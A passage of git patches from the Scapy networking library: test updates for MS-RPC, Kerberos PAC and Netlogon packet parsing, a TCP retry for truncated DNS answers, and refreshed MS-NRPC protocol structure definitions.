c0\xfft\xa8e&\xd4\t]\xcb\xd3;8Q\x96\xf4F#+\xc8\x82\x931\x84M?i\xd3\xfe\xc6\x81\xf6\xc7\xdfm\x7f\xd8\xb52\xecX\xc7\x13\x19]\xad9\xfd\xd2J\xc3\x1c^\x17\xb0\x99\xa5u\xc1nd\xecf\xc6h\xb0\x99\x98@\x0cL\xb4\xd1\xce\xf06\xcaH2v\xce\xa6]\x7f\x96\xbd\x1b\x8f\xb0k\x9c\xd8m\xafL\xf8\x84\x02\x9fO\x97\xef\t^<\xbc3/\xa9\x8eY\x87\xc8qI\xc1\x9f\x15Ks\x8bB\xf0\xe7\x84%]\xd6\xed_\xe0\x0c\xcbO\xd8\xfc\x9a\xc1\xdf\x83\xf7\xcb\xa2_\x96\xfa\xf9\xfcn\xaf\x90+\xdf3\xe6\xd4\xb1\xab\x10\xf9>\xc1\xe7\xf3\xb8\xbc\xc1\x80\x84\xbd\xd7\x0f\x9b\x99\x18dz\xdc\xf9.qX\xbe\xdb\x9d7\xd8Ct\t\x08]Tsk\x10i9\xa6~6SN?[\x865+3%#x\xb9\x80H\x0e\xfd\xa9cW\x0c\xb6Y\x14<\xda\xc5 \xd0\xd6@r\xbb\xdbT\xadr\xa7O\x16\x07{]\xfea\xa5\xd7\xff\x03\xff\xd3\x1e\xfaS\xc7\xad@\x08\x83%\x97\xff\x9e}B]\xde\xac\x1a\xca\x9b\xa5\xa3+,Y\x86\xe5\x06k\xf2\xdbS\xfe\xdeL\xa4\xed\xad\xb6\xf8\xfa\xb2i\x7f=\xa6E]Bf*\xacKj\xda\x1a\xad.\xe12q\xea\x12\xeew\xc5\xaaK\xd8\xb1\x8eQ\x97\xb0\x99\x88uIM\x7fF\xabK\xd8m\x8fQ\x97\xb0\x99\n\xeb\x126_A]\xc2f\xc7\xa8K\xd8L\xa0.as\x15\xd4%lv\x94\xba\xa4"\x061\xeb\x92\x8a\xdc\x19\xb3.as\xa3\xd4%\xec\xbc\xa9\xb0.\xed\xcb\xee\xbd\xf9\xcc\xb7\x9d3\xd7\xbf>iU\x8bV\xd5\xc7*\xbdG V]Bf*\xacKj\xda\x1a\xad.\xe12q\xea\x12\xeew\xc5\xaaK\xd8\xb1\x8eQ\x97\xb0\x99\x88uIM\x7fF\xabK\xd8m\x8fQ\x97\xb0\x99\n\xeb\x126_A]\xc2f\xc7\xa8K\xd8L\xa0.as\x15\xd4%lv\x94\xba\xa4"\x061\xeb\x92\x8a\xdc\x19\xb3.as\xa3\xd4%\xec\xbc\xa9\xb0.\r\xed\xce\xd4dj\x1e]w\x85\x88kb\xcb=vS\x8b\xf3%d\xa6\xc2\xba\xa4\xa6\xad\xd1\xea\x12.\x13\xa7.\xe1~W\xac\xba\x84\x1d\xeb\x18u\t\x9b\x89X\x97\xd4\xf4g\xb4\xba\x84\xdd\xf6\x18u\t\x9b\xa9\xb0.a\xf3\x15\xd4%lv\x8c\xba\x84\xcd\x04\xea\x126WA]\xc2fG\xa9K*b\x10\xb3.\xa9\xc8\x9d1\xeb\x1267J]\xc2\xce\x9b\xd1\xebR\xf8\xb5\xdf\xc7\x1bT\xa1zT\xcf\x98t\xe2\xcbM\xeev%\x9f+~\xc7\x1ePC\x90\xb9\nj\x08.\x13\xa7\x86\xe0~W\xac\x1a\x82\x1d\xeb\x185\x04\x9b\x89XC\xd4\xf4g\xb4\x1a\x82\xdd\xf6\x185\x04\x9b\xa9\xb0\x86`\xf3\x15\xd4\x10lv\x8c\x1a\x82\xcd\x04j\x086WA\r\xc1fG\xa9!*b\x10\xb3\x86\xa8\xc8\x9d1k\x0867J\r\xc1\xce\x9b\x0fk\xc8\xc3\x1a\xf2\xb0\x86<\xac!\x0fk\xc8\xc3\x1a\xa2}\r\t\x9f\xa3\xe8q\xefy\xce\xf8uZ\xe4z\\&\xd6\x9c\x13\xe6w\xc5\x9csBe*\x99s\xc2e\xa2\xce9\xa9\xe8\xcf\xa8sN\xb8m\x8f5\xe7\x84\xcbT:\xe7\x84\xcbW2\xe7\x84\xcb\x8e5\xe7\x84\xcb\x84\xe6\x9cp\xb9J\xe6\x9cp\xd9\xd1\xe6\x9c\xf0c\x10{\xce\t\x97\x0b\xcd9\xe1r\xa3\xcd9\xe1\xe6M\xbc\\\xaf\xf898\x84\\\xaf\xfc\xd9:\xf5\xb9^\xf1w!\xe4z\xe5\xcf\xee)\xcf\xf5\xca\x99\xear=R\x7f*\xcc\xf5\xca\xdb\xae<\xd7+g\xe2\xe5z\xe5|\xf4\\\xaf\x9c\xad<\xd7+g\xa2\xe5z\xe5\\\xf4\\\xaf\x9c\xad,\xd7\xa3\xc4\x00%\xd7+\xe7\xa2\xe5z\xe5\\e\xb9^y\xde\x8c\x9e\xeb\xc3\xf22k\xee\xf2\x9f\n\xa9\xc7k\xac\x0b\xec\xe4\x99\x07N\x7fR\xee\x7f\x98\x97q\xbf+V^Ff*\xc8\xcb\xd8L\xc4\xbc\x8c\x1b\x8fXy\x19\xbb\xed1\xf226Sa^\xc6\xe6+\xc8\xcb\xd8\xec\x18y\x19\x9b\t\xe4el\xae\x82\xbc\x8c\xcd\x8e\x92\x97U\xc4 f^\xc6\xe6\x02y\x19\x9b\x1b%/c\xe7\xcd\xe8y9,\x07a\xbf\xf7\x0f1\x07!\x7f\x8f\x82\x1c\x84\xdd\xf6\x189\x08\x9b\xa90\x07a\xf3\x15\xe4 lv\x8c\x1c\x84\xcd\x04r\x106WA\x0e\xc2fG\xc9A*b\x103\x07\xa9xWh\xcc\x1c\x84\xcd\x8d\x92\x83p\xf7\xdd\x189(\xec\xd9\xe9\x84\xb8j\xf5\xe9\x06\xad-\x1b\x7f\x9b\xf4\xeb\xc5\xf2\xe4<\xd4g\xa7%I\xe4%\xd6!\x1b\x05J`E#GG\xbc\x07\xa2l\xc1\xa0\xb9o\x8c\x7f\xdf\xbakR\xcb\x9eM\xbfm\x80\xfc>\x99\x07\xf0\xc3r\xdb\xecg\xaf\x16\xdd:\xfa_\xeb\xf2\xd6\xd2\xac\xcaD\xcdx\x94\xdcV5\xca\xbb1\x91\x99\x11m\x96%#/Q\xa2$8I\x96\xd1\xb32\x15\xf1<\xb9\xd0\xdc\xd6yj1\x97:e\xef\xc8\x8e3\xd6\xa4\xc0\xbf\x9f\xac\xa0\xcd\xc8L\xc46/\xa8@\xaf_\xbd\xfc\xb2}9{\xe6\x16\xbd\xe0\xdc(-\xda\x8c\xccDl\xf3\x8dS\x85U\x9av~/sB\x93\x99O5:,\x1f\xd7\xa2\xcd\xc8L\xc46\x87\xdfk6~\x9d\x16mFf\xc2m\x0e\xe3\xb7\xfd#\xfd\xeb\xa4\x83m3^.[b\xb8\xf5\'\xd9\n\xf5wm)\xd9)\xc9\xb2\x835\xb0N\xbdS\x08\xec\xee\x11\xef\x8cl\xb3t\xc2\xb6\x92\x96s2F\x15e\x9c-\x18f*An?\xcd\xf1\xa4\xdeH\x8a\x82$Q\x1c)\x91dx\xccG\xed\x1a\xceY\xe7^c\xdf\xa4\xe6^\xe5\x89\xc4\xb2e\x10b\x9e\x10%\xe6\xcdGT\x96\xb7\x7fOw\xfb\xc8\xb2\xb0\xe1\x7f\xbf\xa9]\x03\xb9\xcdFV\xe4\r$ep\x90<\xcb;E\'\x1f~\xfc\x85\xcd\xafLt\xf7\x14\xba\xf2\xe4\xec\xd2\xe3\xaf\xb0c\x18lf\x15"[\xf0\x15\x08\x85i\xa5\xc70a\xef[CfF\xbeo-;\xb3[W[6\x11\xed}kg\xab\xe6M\xad\xf2~n\xe2\x96:\xc4\x99\xb8\n\x0e\xe4\xf7c\n\x06\x07\xc7J\x8c\xe0\xe0i\x89b\xf4F\x86\x0f?F\xc7\xe6\x97\x1e\xa3\xf3\x8c\x85\xb4r6\xd2`\xb0\x18\x18\xbb\xc5j\xb5\xd8lV=\xa3\xa7h\xde\xac\xedv\xe8\x8d\x9cAtr\x0e\xdeh\xe0i\x83\xc3@S\xffo\xf1\x1b\x15\x1d\x9d\xfb\xd2\x85\x0fL+\xf6\'\xbc\xdd\xfd\xcb\xea\x07P\xf9\x9c(\xb1\xa4\xa4\xd7;\x04Jd\r\x82DF\xbc\x97\xee\xca\xac\x96\x9f\xfc\xba\xe1\xa0y\xe5\xe6MV\xe7\x89\xce[\xb5\xe6\xf7\xcf\x99\xf2\x1f\xef\x98\x0e\xc9o\xcd~\xcc\xfeJ\xbb\xcb\xc89\x18\xe2\x7f\xd07~\xd6\xf7\xd4\xc6\x8c\x15\xe7\xca5\x9e\xb3E@\xfe\x8d\x0b\x88\xff\xd4\x85\x89\xb7\x8e\xaei\x9d\xba\xe6p\xfaOM\x9f\xde\x9b\xae5\xbf\xde\xbeEi\x8bO\xecH\x9dzy\xca\xa0a\x9b\xcb\x8c\xd6\x9a\x7fk\xc9\xd5_\x8e\xdd\x9cf\x9e\x99\xeey\xb3\xb0\xbao\x172_\xef\xe0\r2\'\tFI\xa6h\x92\x95\x9c\xe15DW\xa7\xf8\xb9v\xbf\x7f\\c\xed\'\xc4\xfe\xccw\x9b\x9eB\xa9\xdb\xb5\xee\xd6\x90\xb0\xdc\x83\xcc\x0c\xcb=\x94\x99\xa5H\x93\x853\x99\x8d&=i\xe3\xcc\xb4\xcdn\xd4\xf3\x16\x8e7\xe9\xc3\xdb>\xf7\xe3\xbf\xf3j.K\xe4\xe6\xd2\xf6w\xff\xf4\xe7$i\xd1vd&f\xdb_;\xb0.+\xbd\xc7\x96\x8e\x8b\x9c\x973O\xde\\ZT\x1e\xa1\xedu\xef\xb6=\x8c\xd9\xaf\xcd\x88\xf1\xbf\xcc(\xb2,\\x\xeb\x89!)}Z\xa0\xc4\xa3e\x94x 3\xc3\xe2\xc1\xf2f+e\xb5\x18\xacV\xdef\xe3Y;\xcf\xb0\xb4\x91\xe5X\xbdIO\x87\x8f\xf3\x9a\x87\xd2\xf7=\xfdm\xb9\x94W\xf7\xce\xa8\xf3\xce\x9eO\xe7\xa0\x8es\xd6H2\x12)\x894\xcd\x18YI\x10\xe4\x88\xdf\x94\xc2\xe6\x97n\x87\xc1h0q\x94\x8d\xa5-\xa4\xcd`\xe7\xcd\x81\xe3I\xda\xac7\x98)\x13e\x0f\xdf\x0enin\xc5\'\xaa\xad\xed\xb4\xd3\xf5V\xbdN\t\xfc\x11\xe4wz\x91T`\x1f%9\xbd s\xb2\x18\xf8W\xe9\xab\xbb\x89\xff\x03\x056\xf1\x00') conf.max_list_count = 500 -pkt = ept_lookup_Response(data) +pkt = ept_lookup_Response(data, ndr64=False) towers = [protocol_tower_t(x.valueof("tower").tower_octet_string) for x in pkt.valueof("entries")] assert len(towers) == 430 @@ -507,7 +507,7 @@ PID: 960 - 18/09/2023 12:33:50.167234 (1695040430) | Status: 1825 | DetectionLocation: OSF_SCALL__DoSecurityCallbackAndAccessCheck | Flags 0 - | Params: [('eeptiLongVal', 2583494340)] + | Params: [('eeptiLongVal', -1711472956)] PID: 960 - 18/09/2023 12:33:50.151428 (1695040430) | Generating Component: Security Provider | Status: STATUS_SUCCESS diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index fc96f8ccd8c..eb94aaef16b 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -215,7 +215,7 @@ assert [type(x) for x in pkt.Payloads] == [ UPN_DNS_INFO, NDRSerialization1Header, PAC_ATTRIBUTES_INFO, - PAC_REQUESTOR, + PAC_REQUESTOR_SID, PAC_SIGNATURE_DATA, PAC_SIGNATURE_DATA, ] @@ -226,10 +226,10 @@ assert pkt.Payloads[2].DnsDomainName == 'DOM1.LOCAL' assert pkt.Payloads[2].SamName == 'SRV$' assert pkt.Payloads[2].Sid.summary() == 'S-1-5-21-826288890-480667314-1550869521-1104' -assert pkt.Payloads[3].value.Claims.ClaimsSet.value.value[0].value.ClaimsArrays.value.value[0].usClaimsSourceType == 1 -claimentry = pkt.Payloads[3].value.Claims.ClaimsSet.value.value[0].value.ClaimsArrays.value.value[0].ClaimEntries.value.value[0] -assert claimentry.Id.value.value[0].value == b'ad://ext/AuthenticationSilo' -assert claimentry.Values.value.StringValues.value.value[0].value.value[0].value == b'T0-silo' +assert pkt.Payloads[3].valueof("Claims.ClaimsSet.ClaimsArrays")[0].usClaimsSourceType == 1 +claimentry = pkt.Payloads[3].valueof("Claims.ClaimsSet.ClaimsArrays")[0].valueof("ClaimEntries")[0] +assert claimentry.valueof("Id") == b'ad://ext/AuthenticationSilo' +assert claimentry.valueof("Values.StringValues")[0] == b"T0-silo" assert pkt.Payloads[4].Flags[0].PAC_WAS_REQUESTED @@ -252,9 +252,9 @@ pkt = AuthorizationData(data) assert isinstance(pkt.seq[0].adData.Payloads[0], NDRSerialization1Header) k = pkt.seq[0].adData.Payloads[0].value assert isinstance(k, KERB_VALIDATION_INFO) -assert k.EffectiveName.Buffer.value.value[0].value == b'lzhu' -assert k.LogonDomainName.Buffer.value.value[0].value == b"NTDEV" -assert "S%s" % "-".join(str(x) for x in k.LogonDomainId.value.SubAuthority) == 'S21-397955417-626881126-188441444' +assert k.valueof("EffectiveName.Buffer") == b'lzhu' +assert k.valueof("LogonDomainName.Buffer") == b"NTDEV" +assert "S-1-5-%s" % "-".join(str(x) for x in k.LogonDomainId.value.SubAuthority) == 'S-1-5-21-397955417-626881126-188441444' assert len(k.ExtraSids.value.value) == 13 assert [x.RelativeId for x in k.GroupIds.value.value] == [3392609, 2999049, 3322974, 513, 2931095, 3338539, 3354830, 3026599, 3338538, 2931096, 3392610, 3342740, 3392630, 3014318, 2937394, 3278870, 3038018, 3322975, 3513546, 2966661, 3338434, 3271401, 3051245, 3271606, 3026603, 3018354] @@ -840,6 +840,7 @@ claimSet = CLAIMS_SET( usReservedType=0, ulReservedFieldSize=0, ReservedField=None, + ndr64=False, ) = MSPAC - Check that Pointers, Arrays, etc. were inferred diff --git a/test/scapy/layers/msnrpc.uts b/test/scapy/layers/msnrpc.uts index 16e1a842b81..7b31bf85421 100644 --- a/test/scapy/layers/msnrpc.uts +++ b/test/scapy/layers/msnrpc.uts @@ -130,7 +130,8 @@ pkt = ept_map_Request( referent_id=2, value=twr_p_t(tower_octet_string=b'\x05\x00\x13\x00\rxV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\x00\x87\x01\x00\t\x04\x00\x00\x00\x00\x00') ), - max_towers=4 + max_towers=4, + ndr64=False, ) output = bytearray(bytes(pkt)) @@ -166,6 +167,7 @@ pkt = ept_map_Response( twr_p_t(tower_octet_string=b'\x05\x00\x13\x00\rxV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\xc2\x0c\x01\x00\t\x04\x00\xc0\xa8z\x11'), twr_p_t(tower_octet_string=b'\x05\x00\x13\x00\rxV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\xc2\x03\x01\x00\t\x04\x00\xc0\xa8z\x11') ], + ndr64=False, ) pkt.ITowers.value[0].value[0].referent_id = 0x3 @@ -186,6 +188,7 @@ pkt = NetrServerReqChallenge_Request( ComputerName=b'WIN1', ClientChallenge=PNETLOGON_CREDENTIAL(data=b'12345678'), PrimaryName=None, + ndr64=False, ) assert bytes(pkt) == bytes(chall_req) @@ -199,7 +202,8 @@ assert chall_resp.status == 0 = [EXCH] - Re-build NetrServerReqChallenge_Response from scratch pkt = NetrServerReqChallenge_Response( - ServerChallenge=PNETLOGON_CREDENTIAL(data=b'Zq/\xc4D\xfeRI') + ServerChallenge=PNETLOGON_CREDENTIAL(data=b'Zq/\xc4D\xfeRI'), + ndr64=False, ) assert bytes(pkt) == bytes(chall_resp) @@ -223,6 +227,7 @@ pkt = NetrServerAuthenticate3_Request( PrimaryName=None, SecureChannelType="WorkstationSecureChannel", NegotiateFlags=1611661311, + ndr64=False, ) output = bytearray(bytes(pkt)) @@ -242,7 +247,8 @@ pkt = NetrServerAuthenticate3_Response( ServerCredential=PNETLOGON_CREDENTIAL(data=b'1h\x8d\xb8\xf4zH\xaf'), NegotiateFlags=1611661311, AccountRid=1105, - status=0 + status=0, + ndr64=False, ) assert bytes(pkt) == bytes(auth_resp) From da855676d01dfbb632496564975936e5c114c71a Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 20 Aug 2025 18:50:18 +0200 Subject: [PATCH 1532/1632] Refresh included [MS-NRPC] version (#4825) * Update included [MS-NRPC] to latest version * dns_resolve: retry if truncated --- doc/scapy/layers/dcom.rst | 2 +- scapy/layers/dns.py | 26 +- scapy/layers/msrpce/raw/ms_nrpc.py | 4313 +++++++++++++++++++++++++++- scapy/layers/ntlm.py | 8 +- 4 files changed, 4333 insertions(+), 16 deletions(-) diff --git a/doc/scapy/layers/dcom.rst b/doc/scapy/layers/dcom.rst index ada9a56a0b8..203270746bf 100644 --- a/doc/scapy/layers/dcom.rst +++ b/doc/scapy/layers/dcom.rst @@ -54,7 +54,7 @@ General usage import uuid from scapy.layers.dcerpc import find_com_interface - import scapy.layers.msrpce.raw.ms_pla + from scapy.layers.msrpce.raw.ms_pla import GetDataCollectorSets_Request CLSID_TraceSessionCollection = uuid.UUID("03837530-098b-11d8-9414-505054503030") # The COM interface must have been compiled by scapy-rpc (midl-to-scapy) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 3a88a09ba38..3681696a7b7 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -1380,13 +1380,15 @@ def pre_dissect(self, s): @conf.commands.register -def dns_resolve(qname, qtype="A", raw=False, verbose=1, timeout=3, **kwargs): +def dns_resolve(qname, qtype="A", raw=False, tcp=False, verbose=1, timeout=3, **kwargs): """ Perform a simple DNS resolution using conf.nameservers with caching :param qname: the name to query :param qtype: the type to query (default A) :param raw: return the whole DNS packet (default False) + :param tcp: whether to use directly TCP instead of UDP. If truncated is received, + UDP automatically retries in TCP. (default: False) :param verbose: show verbose errors :param timeout: seconds until timeout (per server) :raise TimeoutError: if no DNS servers were reached in time. @@ -1409,8 +1411,11 @@ def dns_resolve(qname, qtype="A", raw=False, verbose=1, timeout=3, **kwargs): for nameserver in conf.nameservers: # Try all nameservers try: - # Spawn a UDP socket, connect to the nameserver on port 53 - sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + # Spawn a socket, connect to the nameserver on port 53 + if tcp: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + else: + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(kwargs["timeout"]) sock.connect((nameserver, 53)) # Connected. Wrap it with DNS @@ -1428,6 +1433,21 @@ def dns_resolve(qname, qtype="A", raw=False, verbose=1, timeout=3, **kwargs): sock.close() if res: # We have a response ! Check for failure + if res[DNS].tc == 1: # truncated ! + if not tcp: + # Retry using TCP + return dns_resolve( + qname=qname, + qtype=qtype, + raw=raw, + tcp=True, + verbose=verbose, + timeout=timeout, + **kwargs, + ) + elif verbose: + log_runtime.info("DNS answer is truncated !") + if res[DNS].rcode == 2: # server failure res = None if verbose: diff --git a/scapy/layers/msrpce/raw/ms_nrpc.py b/scapy/layers/msrpce/raw/ms_nrpc.py index 64da83849c6..0772469ba4b 100644 --- a/scapy/layers/msrpce/raw/ms_nrpc.py +++ b/scapy/layers/msrpce/raw/ms_nrpc.py @@ -3,8 +3,8 @@ # See https://scapy.net/ for more information # Copyright (C) Gabriel Potter -# ms-nrpc.idl compiled on 06/07/2025 -# This file is a stripped version ! Use scapy-rpc for the full. +# [ms-nrpc] v45.0 (Tue, 08 Jul 2025) + """ RPC definitions for the following interfaces: - logon (v1.0): 12345678-1234-ABCD-EF00-01234567CFFB @@ -14,32 +14,1003 @@ from enum import IntEnum import uuid -from scapy.fields import StrFixedLenField +from scapy.fields import PacketListField, StrFixedLenField, StrFixedLenFieldUtf16 from scapy.layers.dcerpc import ( NDRPacket, DceRpcOp, + NDRByteField, + NDRConfFieldListField, + NDRConfPacketListField, + NDRConfStrLenField, + NDRConfVarStrLenField, + NDRConfVarStrLenFieldUtf16, NDRConfVarStrNullField, NDRConfVarStrNullFieldUtf16, + NDRFieldListField, + NDRFullEmbPointerField, NDRFullPointerField, NDRInt3264EnumField, NDRIntField, + NDRLongField, NDRPacketField, + NDRShortField, + NDRSignedIntField, + NDRSignedLongField, + NDRUnionField, register_dcerpc_interface, ) -class PNETLOGON_CREDENTIAL(NDRPacket): +class PNETLOGON_VALIDATION_UAS_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("usrlog1_eff_name", "")), + NDRIntField("usrlog1_priv", 0), + NDRIntField("usrlog1_auth_flags", 0), + NDRIntField("usrlog1_num_logons", 0), + NDRIntField("usrlog1_bad_pw_count", 0), + NDRIntField("usrlog1_last_logon", 0), + NDRIntField("usrlog1_last_logoff", 0), + NDRIntField("usrlog1_logoff_time", 0), + NDRIntField("usrlog1_kickoff_time", 0), + NDRIntField("usrlog1_password_age", 0), + NDRIntField("usrlog1_pw_can_change", 0), + NDRIntField("usrlog1_pw_must_change", 0), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("usrlog1_computer", "")), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("usrlog1_domain", "")), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("usrlog1_script_path", "")), + NDRIntField("usrlog1_reserved1", 0), + ] + + +class NetrLogonUasLogon_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRConfVarStrNullFieldUtf16("UserName", ""), + NDRConfVarStrNullFieldUtf16("Workstation", ""), + ] + + +class NetrLogonUasLogon_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_UAS_INFO(), + PNETLOGON_VALIDATION_UAS_INFO, + ) + ), + NDRIntField("status", 0), + ] + + +class PNETLOGON_LOGOFF_UAS_INFO(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [NDRIntField("Duration", 0), NDRShortField("LogonCount", 0)] + + +class NetrLogonUasLogoff_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRConfVarStrNullFieldUtf16("UserName", ""), + NDRConfVarStrNullFieldUtf16("Workstation", ""), + ] + + +class NetrLogonUasLogoff_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "LogoffInformation", PNETLOGON_LOGOFF_UAS_INFO(), PNETLOGON_LOGOFF_UAS_INFO + ), + NDRIntField("status", 0), + ] + + +class NETLOGON_CREDENTIAL(NDRPacket): fields_desc = [StrFixedLenField("data", "", length=8)] class PNETLOGON_AUTHENTICATOR(NDRPacket): ALIGNMENT = (4, 4) fields_desc = [ - NDRPacketField("Credential", PNETLOGON_CREDENTIAL(), PNETLOGON_CREDENTIAL), + NDRPacketField("Credential", NETLOGON_CREDENTIAL(), NETLOGON_CREDENTIAL), NDRIntField("Timestamp", 0), ] +class NETLOGON_LOGON_INFO_CLASS(IntEnum): + NetlogonInteractiveInformation = 1 + NetlogonNetworkInformation = 2 + NetlogonServiceInformation = 3 + NetlogonGenericInformation = 4 + NetlogonInteractiveTransitiveInformation = 5 + NetlogonNetworkTransitiveInformation = 6 + NetlogonServiceTransitiveInformation = 7 + NetlogonTicketLogonInformation = 8 + + +class UNICODE_STRING(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRShortField("Length", None, size_of="Buffer", adjust=lambda _, x: (x * 2)), + NDRShortField( + "MaximumLength", None, size_of="Buffer", adjust=lambda _, x: (x * 2) + ), + NDRFullEmbPointerField( + NDRConfVarStrLenFieldUtf16( + "Buffer", + "", + size_is=lambda pkt: (pkt.MaximumLength // 2), + length_is=lambda pkt: (pkt.Length // 2), + ) + ), + ] + + +class OLD_LARGE_INTEGER(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [NDRIntField("LowPart", 0), NDRSignedIntField("HighPart", 0)] + + +class NETLOGON_LOGON_IDENTITY_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("LogonDomainName", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("ParameterControl", 0), + NDRPacketField("Reserved", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("UserName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("Workstation", UNICODE_STRING(), UNICODE_STRING), + ] + + +class CYPHER_BLOCK(NDRPacket): + fields_desc = [StrFixedLenField("data", "", length=8)] + + +class LM_OWF_PASSWORD(NDRPacket): + fields_desc = [ + PacketListField( + "data", [CYPHER_BLOCK()] * 2, CYPHER_BLOCK, count_from=lambda _: 2 + ) + ] + + +class NT_OWF_PASSWORD(NDRPacket): + fields_desc = [ + PacketListField( + "data", [CYPHER_BLOCK()] * 2, CYPHER_BLOCK, count_from=lambda _: 2 + ) + ] + + +class PNETLOGON_INTERACTIVE_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField( + "Identity", NETLOGON_LOGON_IDENTITY_INFO(), NETLOGON_LOGON_IDENTITY_INFO + ), + NDRPacketField("LmOwfPassword", LM_OWF_PASSWORD(), LM_OWF_PASSWORD), + NDRPacketField("NtOwfPassword", NT_OWF_PASSWORD(), NT_OWF_PASSWORD), + ] + + +class PNETLOGON_SERVICE_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField( + "Identity", NETLOGON_LOGON_IDENTITY_INFO(), NETLOGON_LOGON_IDENTITY_INFO + ), + NDRPacketField("LmOwfPassword", LM_OWF_PASSWORD(), LM_OWF_PASSWORD), + NDRPacketField("NtOwfPassword", NT_OWF_PASSWORD(), NT_OWF_PASSWORD), + ] + + +class LM_CHALLENGE(NDRPacket): + fields_desc = [StrFixedLenField("data", "", length=8)] + + +class STRING(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRShortField("Length", None, size_of="Buffer"), + NDRShortField("MaximumLength", None, size_of="Buffer"), + NDRFullEmbPointerField( + NDRConfVarStrLenField( + "Buffer", + "", + size_is=lambda pkt: pkt.MaximumLength, + length_is=lambda pkt: pkt.Length, + ) + ), + ] + + +class PNETLOGON_NETWORK_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField( + "Identity", NETLOGON_LOGON_IDENTITY_INFO(), NETLOGON_LOGON_IDENTITY_INFO + ), + NDRPacketField("LmChallenge", LM_CHALLENGE(), LM_CHALLENGE), + NDRPacketField("NtChallengeResponse", STRING(), STRING), + NDRPacketField("LmChallengeResponse", STRING(), STRING), + ] + + +class PNETLOGON_GENERIC_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField( + "Identity", NETLOGON_LOGON_IDENTITY_INFO(), NETLOGON_LOGON_IDENTITY_INFO + ), + NDRPacketField("PackageName", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DataLength", None, size_of="LogonData"), + NDRFullEmbPointerField( + NDRConfStrLenField("LogonData", "", size_is=lambda pkt: pkt.DataLength) + ), + ] + + +class PNETLOGON_TICKET_LOGON_INFO(NDRPacket): + ALIGNMENT = (8, 8) + fields_desc = [ + NDRPacketField( + "Identity", NETLOGON_LOGON_IDENTITY_INFO(), NETLOGON_LOGON_IDENTITY_INFO + ), + NDRLongField("RequestOptions", 0), + NDRIntField("ServiceTicketLength", None, size_of="ServiceTicket"), + NDRFullEmbPointerField( + NDRConfStrLenField( + "ServiceTicket", "", size_is=lambda pkt: pkt.ServiceTicketLength + ) + ), + NDRIntField("AdditionalTicketLength", None, size_of="AdditionalTicket"), + NDRFullEmbPointerField( + NDRConfStrLenField( + "AdditionalTicket", "", size_is=lambda pkt: pkt.AdditionalTicketLength + ) + ), + ] + + +class NETLOGON_VALIDATION_INFO_CLASS(IntEnum): + NetlogonValidationUasInfo = 1 + NetlogonValidationSamInfo = 2 + NetlogonValidationSamInfo2 = 3 + NetlogonValidationGenericInfo = 4 + NetlogonValidationGenericInfo2 = 5 + NetlogonValidationSamInfo4 = 6 + NetlogonValidationTicketLogon = 7 + + +class PGROUP_MEMBERSHIP(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [NDRIntField("RelativeId", 0), NDRIntField("Attributes", 0)] + + +class USER_SESSION_KEY(NDRPacket): + fields_desc = [ + PacketListField( + "data", [CYPHER_BLOCK()] * 2, CYPHER_BLOCK, count_from=lambda _: 2 + ) + ] + + +class RPC_SID_IDENTIFIER_AUTHORITY(NDRPacket): + fields_desc = [StrFixedLenField("Value", "", length=6)] + + +class PRPC_SID(NDRPacket): + ALIGNMENT = (4, 8) + DEPORTED_CONFORMANTS = ["SubAuthority"] + fields_desc = [ + NDRByteField("Revision", 0), + NDRByteField("SubAuthorityCount", None, size_of="SubAuthority"), + NDRPacketField( + "IdentifierAuthority", + 